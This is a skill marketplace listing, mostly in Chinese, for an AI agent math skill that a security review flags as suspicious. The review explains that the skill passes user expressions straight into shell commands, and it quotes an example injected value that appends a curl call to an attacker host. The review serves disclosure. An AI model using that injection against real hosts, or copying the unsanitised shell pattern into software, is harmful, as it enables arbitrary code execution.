← 返回 Skills 市场
johnnyhou327

Math Utils Native

作者 johnnyhou327 · GitHub ↗ · v1.0.1 · MIT-0
cross-platform ⚠ suspicious
418
总下载
0
收藏
3
当前安装
2
版本数
在 OpenClaw 中安装
/install math-utils-native
功能描述
Performs precise math calculations by executing native OS CLI tools like bc, python3, or PowerShell without relying on AI prediction.
安全使用建议
This skill evaluates math expressions by building shell/PowerShell commands from the input and running them with execSync. That means a malicious or malformed expression can inject arbitrary shell commands on the host (e.g., expressions containing ;, ``, $(), backticks, quotes, or other metacharacters). If you plan to install or run this skill, only do so on an isolated, non-production host or container. Prefer safer alternatives: use a dedicated math parser library (e.g., decimal.js, mathjs) or evaluate expressions in a sandboxed process; if you must keep the current approach, apply strict input validation/whitelisting (allow only digits, whitespace, parentheses, and a limited set of operators) and avoid passing user input into a shell string—use execFile/spawn with arguments or a library that evaluates expressions without invoking a shell. If you need help hardening this skill, ask for specific code changes (e.g., a sanitized evaluator or replacement with a trusted math library).
功能分析
Type: OpenClaw Skill Name: math-utils-native Version: 1.0.1 The skill contains a critical command injection vulnerability in `main.js` where the `calculate` function directly interpolates user-provided input into shell commands via `execSync`. This allows for arbitrary code execution on the host system using `bc`, `python3`, or `PowerShell` (e.g., by passing an expression like `1; curl http://attacker.com`). While the behavior aligns with the stated purpose of a native math utility, the lack of any input sanitization makes it highly dangerous.
能力评估
Purpose & Capability
Name/description match the implementation: it executes local CLI tools (bc, python3, PowerShell) to compute expressions. No unrelated credentials, binaries, or installs are requested.
Instruction Scope
SKILL.md explicitly instructs executing local CLI commands to evaluate expressions. The shipped main.js directly interpolates the supplied expression into shell commands (execSync with a single command string) without validation or sanitization, creating a command-injection risk. The instructions do not mention input validation, sandboxing, or safety constraints.
Install Mechanism
No install spec (instruction-only + small code file). Nothing is downloaded or installed by the skill, so there is no supply-chain install risk here.
Credentials
The skill requests no environment variables, credentials, or config paths — appropriate and minimal for the stated purpose.
Persistence & Privilege
always is false and the skill does not request any special persistent or cross-skill privileges. It runs on-demand and does not modify other skills or system-wide settings.
如何使用
  1. 确保已安装 OpenClaw(本地或 Docker 部署)
  2. 在对话框中输入安装命令:/install math-utils-native
  3. 安装完成后,直接呼叫该 Skill 的名称或使用 /math-utils-native 触发
  4. 根据 Skill 的参数说明提供必要输入,即可获得结构化输出
版本历史
v1.0.1
- No changes detected; this version is functionally identical to the previous release. - All descriptions, usage instructions, and implementation details remain unchanged.
v1.0.0
Initial release of math-utils-native: - Provides accurate mathematical computation by invoking the operating system’s native CLI calculator tools. - Supports Linux, macOS, and Windows by auto-detecting OS and choosing appropriate calculation backends (`bc`, `python3`, or PowerShell). - Exposes a `calculate(expression)` function for precise evaluation of math expressions. - Ensures all results are computed and validated at the system level, independent of language model prediction.
元数据
Slug math-utils-native
版本 1.0.1
许可证 MIT-0
累计安装 3
当前安装数 3
历史版本数 2
常见问题

Math Utils Native 是什么?

Performs precise math calculations by executing native OS CLI tools like bc, python3, or PowerShell without relying on AI prediction. 它是一个面向 Claude Code / OpenClaw 的 AI Agent Skill 插件,目前累计下载 418 次。

如何安装 Math Utils Native?

在 OpenClaw 或 Claude Code 对话框中运行命令「/install math-utils-native」即可一键安装,无需额外配置。

Math Utils Native 是免费的吗?

是的,Math Utils Native 完全免费,采用 MIT-0 许可证,可自由下载、安装和使用。

Math Utils Native 支持哪些平台?

Math Utils Native 跨平台运行,可在任意部署了 OpenClaw / Claude Code 的环境中使用(cross-platform)。

谁开发了 Math Utils Native?

由 johnnyhou327(@johnnyhou327)开发并维护,当前版本 v1.0.1。

推荐 Skills
self-improving agent
Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Clau...
⬇ 463283 · by pskoett
Skill Vetter
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
⬇ 259410 · by spclaudehome
Polymarket
Query Polymarket prediction markets. Check odds, find trending markets, search events, track price movements.
⬇ 232503 · by joelchance
Self-Improving + Proactive Agent
Self-reflection + Self-criticism + Self-learning + Self-organizing memory. Agent evaluates its own work, catches mistakes, and improves permanently. Use when...
⬇ 200423 · by ivangdavila
Github
Interact with GitHub using the `gh` CLI. Use `gh issue`, `gh pr`, `gh run`, and `gh api` for issues, PRs, CI runs, and advanced queries.
⬇ 191115 · by steipete
ontology
Typed knowledge graph for structured agent memory and composable skills. Use when creating/querying entities (Person, Project, Task, Event, Document), linkin...
⬇ 190156 · by oswalpalash

💬 留言讨论